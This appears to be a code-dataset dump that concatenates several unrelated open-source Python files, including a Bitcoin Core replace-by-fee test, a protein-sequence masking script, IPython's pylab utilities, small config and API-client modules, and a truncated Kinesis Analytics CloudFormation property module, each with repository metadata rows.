assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx1b_hex, 0)
# Use prioritisetransaction to set tx1a's fee to 0.
self.nodes[0].prioritisetransaction(txid=tx1a_txid, fee_delta=int(-0.1 * COIN))
# Now tx1b should be able to replace tx1a
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, 0)
assert tx1b_txid in self.nodes[0].getrawmempool()
# 2. Check that absolute fee checks use modified fee.
tx1_outpoint = self.make_utxo(self.nodes[0], int(1.1 * COIN))
tx2a = CTransaction()
tx2a.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx2a_hex = tx2a.serialize().hex()
self.nodes[0].sendrawtransaction(tx2a_hex, 0)
# Lower fee, but we'll prioritise it
tx2b = CTransaction()
tx2b.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2b.vout = [CTxOut(int(1.01 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx2b.rehash()
tx2b_hex = tx2b.serialize().hex()
# Verify tx2b cannot replace tx2a.
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx2b_hex, 0)
# Now prioritise tx2b to have a higher modified fee
self.nodes[0].prioritisetransaction(txid=tx2b.hash, fee_delta=int(0.1 * COIN))
# tx2b should now be accepted
tx2b_txid = self.nodes[0].sendrawtransaction(tx2b_hex, 0)
assert tx2b_txid in self.nodes[0].getrawmempool()
def test_rpc(self):
us0 = self.nodes[0].listunspent()[0]
ins = [us0]
outs = {self.nodes[0].getnewaddress(): Decimal(1.0000000)}
rawtx0 = self.nodes[0].createrawtransaction(ins, outs, 0, True)
rawtx1 = self.nodes[0].createrawtransaction(ins, outs, 0, False)
json0 = self.nodes[0].decoderawtransaction(rawtx0)
json1 = self.nodes[0].decoderawtransaction(rawtx1)
assert_equal(json0["vin"][0]["sequence"], 4294967293)
assert_equal(json1["vin"][0]["sequence"], 4294967295)
rawtx2 = self.nodes[0].createrawtransaction([], outs)
frawtx2a = self.nodes[0].fundrawtransaction(rawtx2, {"replaceable": True})
frawtx2b = self.nodes[0].fundrawtransaction(rawtx2, {"replaceable": False})
json0 = self.nodes[0].decoderawtransaction(frawtx2a['hex'])
json1 = self.nodes[0].decoderawtransaction(frawtx2b['hex'])
assert_equal(json0["vin"][0]["sequence"], 4294967293)
assert_equal(json1["vin"][0]["sequence"], 4294967294)
def test_no_inherited_signaling(self):
confirmed_utxo = self.wallet.get_utxo()
# Create an explicitly opt-in parent transaction
optin_parent_tx = self.wallet.send_self_transfer(
from_node=self.nodes[0],
utxo_to_spend=confirmed_utxo,
sequence=BIP125_SEQUENCE_NUMBER,
fee_rate=Decimal('0.01'),
)
assert_equal(True, self.nodes[0].getmempoolentry(optin_parent_tx['txid'])['bip125-replaceable'])
replacement_parent_tx = self.wallet.create_self_transfer(
from_node=self.nodes[0],
utxo_to_spend=confirmed_utxo,
sequence=BIP125_SEQUENCE_NUMBER,
fee_rate=Decimal('0.02'),
)
# Test if parent tx can be replaced.
res = self.nodes[0].testmempoolaccept(rawtxs=[replacement_parent_tx['hex']])[0]
# Parent can be replaced.
assert_equal(res['allowed'], True)
# Create an opt-out child tx spending the opt-in parent
parent_utxo = self.wallet.get_utxo(txid=optin_parent_tx['txid'])
optout_child_tx = self.wallet.send_self_transfer(
from_node=self.nodes[0],
utxo_to_spend=parent_utxo,
sequence=0xffffffff,
fee_rate=Decimal('0.01'),
)
# Reports true due to inheritance
assert_equal(True, self.nodes[0].getmempoolentry(optout_child_tx['txid'])['bip125-replaceable'])
replacement_child_tx = self.wallet.create_self_transfer(
from_node=self.nodes[0],
utxo_to_spend=parent_utxo,
sequence=0xffffffff,
fee_rate=Decimal('0.02'),
mempool_valid=False,
)
# Broadcast replacement child tx
# BIP 125 :
# 1. The original transactions signal replaceability explicitly or through inheritance as described in the above
# Summary section.
# The original transaction (`optout_child_tx`) doesn't signal RBF but its parent (`optin_parent_tx`) does.
# The replacement transaction (`replacement_child_tx`) should be able to replace the original transaction.
# See CVE-2021-31876 for further explanations.
assert_equal(True, self.nodes[0].getmempoolentry(optin_parent_tx['txid'])['bip125-replaceable'])
assert_raises_rpc_error(-26, 'txn-mempool-conflict', self.nodes[0].sendrawtransaction, replacement_child_tx["hex"], 0)
self.log.info('Check that the child tx can still be replaced (via a tx that also replaces the parent)')
replacement_parent_tx = self.wallet.send_self_transfer(
from_node=self.nodes[0],
utxo_to_spend=confirmed_utxo,
sequence=0xffffffff,
fee_rate=Decimal('0.03'),
)
# Check that child is removed and update wallet utxo state
assert_raises_rpc_error(-5, 'Transaction not in mempool', self.nodes[0].getmempoolentry, optout_child_tx['txid'])
self.wallet.get_utxo(txid=optout_child_tx['txid'])
def test_replacement_relay_fee(self):
tx = self.wallet.send_self_transfer(from_node=self.nodes[0])['tx']
# Higher fee, higher feerate, different txid, but the replacement does not provide a relay
# fee conforming to node's `incrementalrelayfee` policy of 1000 sat per KB.
tx.vout[0].nValue -= 1
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx.serialize().hex())
if __name__ == '__main__':
ReplaceByFeeTest().main()
| 41.376789 | 126 | 0.637132 |
81546c8d57f79b489b68e06db43e8c91d7ca9ce7 | 3,449 | py | Python | pipeline/mask_constant_regions.py | greninger-lab/tprk_diversity2 | c7fba6a42ae1476f6dce923184d0c0c0b7eed846 | [
"MIT"
] | null | null | null | pipeline/mask_constant_regions.py | greninger-lab/tprk_diversity2 | c7fba6a42ae1476f6dce923184d0c0c0b7eed846 | [
"MIT"
] | null | null | null | pipeline/mask_constant_regions.py | greninger-lab/tprk_diversity2 | c7fba6a42ae1476f6dce923184d0c0c0b7eed846 | [
"MIT"
] | null | null | null | # Masks constant regions in full length sequences from unwrap.fasta, which can be generated from the following command:
# awk 'BEGIN {RS=">";FS="\n";OFS=""} NR>1 {print ">"$1; $1=""; print}' Isolates_aa_filt_fullORFs.aln.fasta > unwrap.fasta
# Constant regions are found with fuzzy match based on length, and replaced with X's.
import subprocess
import argparse
import sys
import os
import regex
from itertools import chain
import numpy as np
from Bio.Seq import Seq
from Bio.Alphabet import generic_dna
import pandas as pd
constant_regions = ["MIDPSATSRYGSPRLVSNGFRHRRKVVYQRVGHRRFSLIFFFVVVLGRSPRLWAQVSFTPDIEGYAELAW",
"GFKTTTDFKIVFPIVAKKDFKYRGEGNVYAEINVKALKLSLESNGGAKFDTKGSAKTIEATLHCYGAYLTIGKNPDFKSTFAVLWEPWTANGDYKSKGDKPVYEPGFEGAGGKLGYKQTDIAGTGLTFDIAFKFASNTD",
"GDILFGWERTREDGVQEYIKVELTGNS","KLWGLCALAA","GADALLTSGYRWFSAGGYFAS","KLETKGSDPDTSFLEGLDLGVDVRTYM","YFPVYGKVWGSYRHDMGEYGWVKVYANL","ECGVVVSPLEKVEIRLSWEQGKLQENSNVVIEKNVTERWQFVGACRLIW"]
fasta_file = "unwrap.fasta"
output_file = open("masked_constant_regions.fasta","w+")
output_names = []
output_read_seqs = []
for line_num, line in enumerate(open(fasta_file)):
## Read name
if (line_num % 2 == 0):
read_name = line.rstrip()
read_count = int(read_name.split("_")[2])
#output_names.append(read_name)
#output_file.write(read_name+"\n")
## Read sequence
else:
read_seq = line.rstrip()
masked_read_seq = read_seq
num_masks = 0
## Loop through constant regions
for constant_seq in constant_regions:
## First find exact match and replace with Ns
exact_match = regex.search(constant_seq,read_seq)
if exact_match:
masked_read_seq = masked_read_seq.replace(exact_match[0],'X'*len(exact_match[0]))
num_masks +=1
## Now we look for fuzzy matches
else:
## Fuzzy matching for shorter constant regions will be <3 substitutions
if(len(constant_seq) < 48):
fuzzy_match = regex.search(r"(?b)("+constant_seq + "){s<=3}", read_seq)
else:
fuzzy_match = regex.search(r"(?b)("+constant_seq + "){s<=5}", read_seq)
## Replace fuzzy match with Ns
if fuzzy_match:
masked_read_seq = masked_read_seq.replace(fuzzy_match[0],'X'*len(fuzzy_match[0]))
num_masks+=1
## First sequence, just add to list
if output_names == []:
output_names.append(read_name)
output_read_seqs.append(masked_read_seq)
else:
## Otherwise look for existing read seq
existing_match = False
for index_num, existing_read_seq in enumerate(output_read_seqs):
if masked_read_seq == existing_read_seq:
prev_name = output_names[index_num]
prev_count = int(prev_name.split("_")[2])
sample_name = read_name.split("_")[0]
prev_sample_name = prev_name.split("_")[0]
# only collapse if they are within the same sample
if sample_name == prev_sample_name:
new_count = prev_count + read_count
new_name = prev_name.split("_")[0]+"_"+prev_name.split("_")[1]+"_"+ str(new_count)
output_names[index_num] = new_name
print(output_names[index_num])
print("collapsing ",prev_name," and ",read_name," into ",new_name)
existing_match = True
else:
print("Identical matches between different samples found. Not collapsing.")
if not existing_match:
output_names.append(read_name)
output_read_seqs.append(masked_read_seq)
for index, name in enumerate(output_names):
output_file.write(name + "\n")
output_file.write(output_read_seqs[index] + "\n") | 34.838384 | 180 | 0.733546 |
0cc5e89622e5abf0cfd01ce1a97aad5032d83ba8 | 678 | py | Python | google/cloud/memcache_v1beta2/services/cloud_memcache/__init__.py | vam-google/python-memcache | 247ad6661e64d32fc4ba83b65b8f1562748dabe0 | [
"Apache-2.0"
] | null | null | null | google/cloud/memcache_v1beta2/services/cloud_memcache/__init__.py | vam-google/python-memcache | 247ad6661e64d32fc4ba83b65b8f1562748dabe0 | [
"Apache-2.0"
] | null | null | null | google/cloud/memcache_v1beta2/services/cloud_memcache/__init__.py | vam-google/python-memcache | 247ad6661e64d32fc4ba83b65b8f1562748dabe0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .client import CloudMemcacheClient
__all__ = ("CloudMemcacheClient",)
| 32.285714 | 74 | 0.750737 |
b6d9bf785b5406fe0d86ca83d6b96535ff39dd37 | 11,701 | py | Python | pkgs/ipython-1.2.1-py27_0/lib/python2.7/site-packages/IPython/core/pylabtools.py | wangyum/anaconda | 6e5a0dbead3327661d73a61e85414cf92aa52be6 | [
"Apache-2.0",
"BSD-3-Clause"
] | 26 | 2018-02-14T23:52:58.000Z | 2021-08-16T13:50:03.000Z | pkgs/ipython-1.2.1-py27_0/lib/python2.7/site-packages/IPython/core/pylabtools.py | wangyum/anaconda | 6e5a0dbead3327661d73a61e85414cf92aa52be6 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | pkgs/ipython-1.2.1-py27_0/lib/python2.7/site-packages/IPython/core/pylabtools.py | wangyum/anaconda | 6e5a0dbead3327661d73a61e85414cf92aa52be6 | [
"Apache-2.0",
"BSD-3-Clause"
] | 10 | 2018-08-13T19:38:39.000Z | 2020-04-19T03:02:00.000Z | # -*- coding: utf-8 -*-
"""Pylab (matplotlib) support utilities.
Authors
-------
* Fernando Perez.
* Brian Granger
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2009 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import sys
from io import BytesIO
from IPython.core.display import _pngxy
from IPython.utils.decorators import flag_calls
# If user specifies a GUI, that dictates the backend, otherwise we read the
# user's mpl default from the mpl rc structure
backends = {'tk': 'TkAgg',
'gtk': 'GTKAgg',
'wx': 'WXAgg',
'qt': 'Qt4Agg', # qt3 not supported
'qt4': 'Qt4Agg',
'osx': 'MacOSX',
'inline' : 'module://IPython.kernel.zmq.pylab.backend_inline'}
# We also need a reverse backends2guis mapping that will properly choose which
# GUI support to activate based on the desired matplotlib backend. For the
# most part it's just a reverse of the above dict, but we also need to add a
# few others that map to the same GUI manually:
backend2gui = dict(zip(backends.values(), backends.keys()))
# Our tests expect backend2gui to just return 'qt'
backend2gui['Qt4Agg'] = 'qt'
# In the reverse mapping, there are a few extra valid matplotlib backends that
# map to the same GUI support
backend2gui['GTK'] = backend2gui['GTKCairo'] = 'gtk'
backend2gui['WX'] = 'wx'
backend2gui['CocoaAgg'] = 'osx'
#-----------------------------------------------------------------------------
# Matplotlib utilities
#-----------------------------------------------------------------------------
def getfigs(*fig_nums):
"""Get a list of matplotlib figures by figure numbers.
If no arguments are given, all available figures are returned. If the
argument list contains references to invalid figures, a warning is printed
but the function continues pasting further figures.
Parameters
----------
figs : tuple
A tuple of ints giving the figure numbers of the figures to return.
"""
from matplotlib._pylab_helpers import Gcf
if not fig_nums:
fig_managers = Gcf.get_all_fig_managers()
return [fm.canvas.figure for fm in fig_managers]
else:
figs = []
for num in fig_nums:
f = Gcf.figs.get(num)
if f is None:
print('Warning: figure %s not available.' % num)
else:
figs.append(f.canvas.figure)
return figs
def figsize(sizex, sizey):
"""Set the default figure size to be [sizex, sizey].
This is just an easy to remember, convenience wrapper that sets::
matplotlib.rcParams['figure.figsize'] = [sizex, sizey]
"""
import matplotlib
matplotlib.rcParams['figure.figsize'] = [sizex, sizey]
def print_figure(fig, fmt='png'):
"""Convert a figure to svg or png for inline display."""
from matplotlib import rcParams
# When there's an empty figure, we shouldn't return anything, otherwise we
# get big blank areas in the qt console.
if not fig.axes and not fig.lines:
return
fc = fig.get_facecolor()
ec = fig.get_edgecolor()
bytes_io = BytesIO()
dpi = rcParams['savefig.dpi']
if fmt == 'retina':
dpi = dpi * 2
fmt = 'png'
fig.canvas.print_figure(bytes_io, format=fmt, bbox_inches='tight',
facecolor=fc, edgecolor=ec, dpi=dpi)
data = bytes_io.getvalue()
return data
def retina_figure(fig):
"""format a figure as a pixel-doubled (retina) PNG"""
pngdata = print_figure(fig, fmt='retina')
w, h = _pngxy(pngdata)
metadata = dict(width=w//2, height=h//2)
return pngdata, metadata
# We need a little factory function here to create the closure where
# safe_execfile can live.
def mpl_runner(safe_execfile):
"""Factory to return a matplotlib-enabled runner for %run.
Parameters
----------
safe_execfile : function
This must be a function with the same interface as the
:meth:`safe_execfile` method of IPython.
Returns
-------
A function suitable for use as the ``runner`` argument of the %run magic
function.
"""
def mpl_execfile(fname,*where,**kw):
"""matplotlib-aware wrapper around safe_execfile.
Its interface is identical to that of the :func:`execfile` builtin.
This is ultimately a call to execfile(), but wrapped in safeties to
properly handle interactive rendering."""
import matplotlib
import matplotlib.pylab as pylab
#print '*** Matplotlib runner ***' # dbg
# turn off rendering until end of script
is_interactive = matplotlib.rcParams['interactive']
matplotlib.interactive(False)
safe_execfile(fname,*where,**kw)
matplotlib.interactive(is_interactive)
# make rendering call now, if the user tried to do it
if pylab.draw_if_interactive.called:
pylab.draw()
pylab.draw_if_interactive.called = False
return mpl_execfile
def select_figure_format(shell, fmt):
"""Select figure format for inline backend, can be 'png', 'retina', or 'svg'.
Using this method ensures only one figure format is active at a time.
"""
from matplotlib.figure import Figure
from IPython.kernel.zmq.pylab import backend_inline
svg_formatter = shell.display_formatter.formatters['image/svg+xml']
png_formatter = shell.display_formatter.formatters['image/png']
if fmt == 'png':
svg_formatter.type_printers.pop(Figure, None)
png_formatter.for_type(Figure, lambda fig: print_figure(fig, 'png'))
elif fmt in ('png2x', 'retina'):
svg_formatter.type_printers.pop(Figure, None)
png_formatter.for_type(Figure, retina_figure)
elif fmt == 'svg':
png_formatter.type_printers.pop(Figure, None)
svg_formatter.for_type(Figure, lambda fig: print_figure(fig, 'svg'))
else:
raise ValueError("supported formats are: 'png', 'retina', 'svg', not %r" % fmt)
# set the format to be used in the backend()
backend_inline._figure_format = fmt
#-----------------------------------------------------------------------------
# Code for initializing matplotlib and importing pylab
#-----------------------------------------------------------------------------
def find_gui_and_backend(gui=None, gui_select=None):
"""Given a gui string return the gui and mpl backend.
Parameters
----------
gui : str
Can be one of ('tk','gtk','wx','qt','qt4','inline').
gui_select : str
Can be one of ('tk','gtk','wx','qt','qt4','inline').
This is any gui already selected by the shell.
Returns
-------
A tuple of (gui, backend) where backend is one of ('TkAgg','GTKAgg',
'WXAgg','Qt4Agg','module://IPython.kernel.zmq.pylab.backend_inline').
"""
import matplotlib
if gui and gui != 'auto':
# select backend based on requested gui
backend = backends[gui]
else:
# We need to read the backend from the original data structure, *not*
# from mpl.rcParams, since a prior invocation of %matplotlib may have
# overwritten that.
# WARNING: this assumes matplotlib 1.1 or newer!!
backend = matplotlib.rcParamsOrig['backend']
# In this case, we need to find what the appropriate gui selection call
# should be for IPython, so we can activate inputhook accordingly
gui = backend2gui.get(backend, None)
# If we have already had a gui active, we need it and inline are the
# ones allowed.
if gui_select and gui != gui_select:
gui = gui_select
backend = backends[gui]
return gui, backend
def activate_matplotlib(backend):
"""Activate the given backend and set interactive to True."""
import matplotlib
matplotlib.interactive(True)
# Matplotlib had a bug where even switch_backend could not force
# the rcParam to update. This needs to be set *before* the module
# magic of switch_backend().
matplotlib.rcParams['backend'] = backend
import matplotlib.pyplot
matplotlib.pyplot.switch_backend(backend)
# This must be imported last in the matplotlib series, after
# backend/interactivity choices have been made
import matplotlib.pylab as pylab
pylab.show._needmain = False
# We need to detect at runtime whether show() is called by the user.
# For this, we wrap it into a decorator which adds a 'called' flag.
pylab.draw_if_interactive = flag_calls(pylab.draw_if_interactive)
def import_pylab(user_ns, import_all=True):
"""Populate the namespace with pylab-related values.
Imports matplotlib, pylab, numpy, and everything from pylab and numpy.
Also imports a few names from IPython (figsize, display, getfigs)
"""
# Import numpy as np/pyplot as plt are conventions we're trying to
# somewhat standardize on. Making them available to users by default
# will greatly help this.
s = ("import numpy\n"
"import matplotlib\n"
"from matplotlib import pylab, mlab, pyplot\n"
"np = numpy\n"
"plt = pyplot\n"
)
exec s in user_ns
if import_all:
s = ("from matplotlib.pylab import *\n"
"from numpy import *\n")
exec s in user_ns
# IPython symbols to add
user_ns['figsize'] = figsize
from IPython.core.display import display
# Add display and getfigs to the user's namespace
user_ns['display'] = display
user_ns['getfigs'] = getfigs
def configure_inline_support(shell, backend):
"""Configure an IPython shell object for matplotlib use.
Parameters
----------
shell : InteractiveShell instance
backend : matplotlib backend
"""
# If using our svg payload backend, register the post-execution
# function that will pick up the results for display. This can only be
# done with access to the real shell object.
# Note: if we can't load the inline backend, then there's no point
# continuing (such as in terminal-only shells in environments without
# zeromq available).
try:
from IPython.kernel.zmq.pylab.backend_inline import InlineBackend
except ImportError:
return
from matplotlib import pyplot
cfg = InlineBackend.instance(parent=shell)
cfg.shell = shell
if cfg not in shell.configurables:
shell.configurables.append(cfg)
if backend == backends['inline']:
from IPython.kernel.zmq.pylab.backend_inline import flush_figures
shell.register_post_execute(flush_figures)
# Save rcParams that will be overwrittern
shell._saved_rcParams = dict()
for k in cfg.rc:
shell._saved_rcParams[k] = pyplot.rcParams[k]
# load inline_rc
pyplot.rcParams.update(cfg.rc)
else:
from IPython.kernel.zmq.pylab.backend_inline import flush_figures
if flush_figures in shell._post_execute:
shell._post_execute.pop(flush_figures)
if hasattr(shell, '_saved_rcParams'):
pyplot.rcParams.update(shell._saved_rcParams)
del shell._saved_rcParams
# Setup the default figure format
select_figure_format(shell, cfg.figure_format)
| 34.414706 | 87 | 0.627724 |
0c4f9df7b10e49a9781d16ebba44dffa8e5e8c88 | 699 | py | Python | config.py | njiiri12/News-Highlights | ff9e2170c2b8f7f54534a4b9de38a55a111b0ad8 | [
"MIT"
] | null | null | null | config.py | njiiri12/News-Highlights | ff9e2170c2b8f7f54534a4b9de38a55a111b0ad8 | [
"MIT"
] | null | null | null | config.py | njiiri12/News-Highlights | ff9e2170c2b8f7f54534a4b9de38a55a111b0ad8 | [
"MIT"
] | null | null | null | import os
class Config:
'''
General configuration parent class
'''
NEWS_API_BASE_URL = 'https://newsapi.org/v2/sources?apiKey={}'
NEWS_API_KEY = os.environ.get('NEWS_API_KEY')
SECRET_KEY = os.environ.get('SECRET_KEY')
class ProdConfig(Config):
'''
Production configuration child class
Args:
Config: The parent configuration class with General configuration settings
'''
pass
class DevConfig(Config):
'''
Development configuration child class
Args:
Config: The parent configuration class with General configuration settings
'''
DEBUG = True
config_options = {
'development':DevConfig,
'production':ProdConfig
} | 20.558824 | 82 | 0.683834 |
bc5e03b2e0f3899b490b55bc52487166fc9e49c1 | 385 | py | Python | pydoccano/features.py | evstratbg/pydoccano | ce14307cae53f785f714656981b5b9a463758ef3 | [
"MIT"
] | 2 | 2020-04-11T14:48:28.000Z | 2020-09-24T12:38:30.000Z | pydoccano/features.py | evstratbg/pydoccano | ce14307cae53f785f714656981b5b9a463758ef3 | [
"MIT"
] | null | null | null | pydoccano/features.py | evstratbg/pydoccano | ce14307cae53f785f714656981b5b9a463758ef3 | [
"MIT"
] | 2 | 2020-04-06T11:46:45.000Z | 2020-04-27T03:18:46.000Z | from requests import Session
from .base_api import BaseApi
class Features(BaseApi):
def __init__(self, base_url: str, session: Session, version='v1'):
super().__init__(base_url)
self.session = session
self.version = version
self.base_endpoint = f"{self.version}/features"
def get(self):
return self._get(endpoint=self.base_endpoint)
| 25.666667 | 70 | 0.680519 |
94f31e77d2a4496e05d3edc5301d8705bf4f2c2f | 108,821 | py | Python | cottonformation/res/kinesisanalyticsv2.py | MacHu-GWU/cottonformation-project | 23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b | [
"BSD-2-Clause"
] | 5 | 2021-07-22T03:45:59.000Z | 2021-12-17T21:07:14.000Z | cottonformation/res/kinesisanalyticsv2.py | MacHu-GWU/cottonformation-project | 23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b | [
"BSD-2-Clause"
] | 1 | 2021-06-25T18:01:31.000Z | 2021-06-25T18:01:31.000Z | cottonformation/res/kinesisanalyticsv2.py | MacHu-GWU/cottonformation-project | 23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b | [
"BSD-2-Clause"
] | 2 | 2021-06-27T03:08:21.000Z | 2021-06-28T22:15:51.000Z | # -*- coding: utf-8 -*-
"""
This module
"""
import attr
import typing
from ..core.model import (
Property, Resource, Tag, GetAtt, TypeHint, TypeCheck,
)
from ..core.constant import AttrMeta
#--- Property declaration ---
@attr.s
class PropApplicationReferenceDataSourceRecordColumn(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.RecordColumn"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn.html
Property Document:
- ``rp_Name``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn-name
- ``rp_SqlType``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn-sqltype
- ``p_Mapping``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn-mapping
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.RecordColumn"
rp_Name: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "Name"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn-name"""
rp_SqlType: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "SqlType"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn-sqltype"""
p_Mapping: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "Mapping"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn-mapping"""
@attr.s
class PropApplicationS3ContentLocation(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.S3ContentLocation"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentlocation.html
Property Document:
- ``p_BucketARN``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentlocation.html#cfn-kinesisanalyticsv2-application-s3contentlocation-bucketarn
- ``p_FileKey``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentlocation.html#cfn-kinesisanalyticsv2-application-s3contentlocation-filekey
- ``p_ObjectVersion``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentlocation.html#cfn-kinesisanalyticsv2-application-s3contentlocation-objectversion
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.S3ContentLocation"
p_BucketARN: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "BucketARN"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentlocation.html#cfn-kinesisanalyticsv2-application-s3contentlocation-bucketarn"""
p_FileKey: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "FileKey"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentlocation.html#cfn-kinesisanalyticsv2-application-s3contentlocation-filekey"""
p_ObjectVersion: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "ObjectVersion"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentlocation.html#cfn-kinesisanalyticsv2-application-s3contentlocation-objectversion"""
@attr.s
class PropApplicationPropertyGroup(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.PropertyGroup"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-propertygroup.html
Property Document:
- ``p_PropertyGroupId``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-propertygroup.html#cfn-kinesisanalyticsv2-application-propertygroup-propertygroupid
- ``p_PropertyMap``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-propertygroup.html#cfn-kinesisanalyticsv2-application-propertygroup-propertymap
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.PropertyGroup"
p_PropertyGroupId: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "PropertyGroupId"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-propertygroup.html#cfn-kinesisanalyticsv2-application-propertygroup-propertygroupid"""
p_PropertyMap: dict = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(dict)),
metadata={AttrMeta.PROPERTY_NAME: "PropertyMap"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-propertygroup.html#cfn-kinesisanalyticsv2-application-propertygroup-propertymap"""
@attr.s
class PropApplicationInputParallelism(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.InputParallelism"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputparallelism.html
Property Document:
- ``p_Count``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputparallelism.html#cfn-kinesisanalyticsv2-application-inputparallelism-count
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.InputParallelism"
p_Count: int = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(int)),
metadata={AttrMeta.PROPERTY_NAME: "Count"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputparallelism.html#cfn-kinesisanalyticsv2-application-inputparallelism-count"""
@attr.s
class PropApplicationOutputKinesisFirehoseOutput(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationOutput.KinesisFirehoseOutput"
